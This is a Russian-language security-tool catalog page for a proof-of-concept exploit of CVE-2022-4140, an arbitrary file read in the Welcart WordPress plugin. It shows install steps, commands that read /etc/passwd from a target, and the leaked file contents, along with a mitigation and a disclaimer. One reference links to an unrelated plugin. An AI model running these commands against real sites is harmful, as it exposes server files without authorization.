Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-4140 — WordPress-плагин Welcart e-Commerce < 2.8.5 — произвольное чтение файлов | Kitploit
Инструменты/GitHubGitHub/anirbala98/cve-2022-4140
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubanirbala98/cve-2022-4140

CVE-2022-4140

WordPress-плагин Welcart e-Commerce < 2.8.5 — произвольное чтение файлов

Репозиторий
22 ч 59 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-4140 - Плагин WordPress Welcart e-Commerce < 2.8.5 - Произвольное чтение файлов

Этот репозиторий содержит Proof of Concept (PoC) эксплойт для CVE-2022-4140.

Отказ от ответственности

Этот проект предоставлен только в образовательных целях и для авторизованного тестирования безопасности. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет разрешения.

Обзор

Плагин не проверяет пользовательский ввод перед его использованием для вывода содержимого файла, что может позволить неаутентифицированному злоумышленнику читать произвольные файлы на сервере.

Затронутая версия

КомпонентВерсия
Уязвимый плагин<=2.8.4
Исправленный плагин2.8.5

Требования

  • Python 3.13.14
  • Requests 2.32.5

Установка

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2022-4140.git
cd CVE-2022-4140/
pip install -r requirements.txt

Использование

root@kitploit:~
python exploit.py <base_url> -f <расположение файла> --disable-version-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd

Пример

root@kitploit:~
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd                             
[*] Проверка, уязвима ли цель
[+] Обнаружена версия плагина: 2.8.4
[+] Цель уязвима

[*] Попытка чтения произвольного файла

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

Смягчение последствий

Обновите плагин до версии 2.8.5.

Ссылки

  • https://nvd.nist.gov/vuln/detail/CVE-2022-4140
  • https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7/
  • https://plugins.svn.wordpress.org/planyo-online-reservation-system/tags/2.9/
Скачать инструмент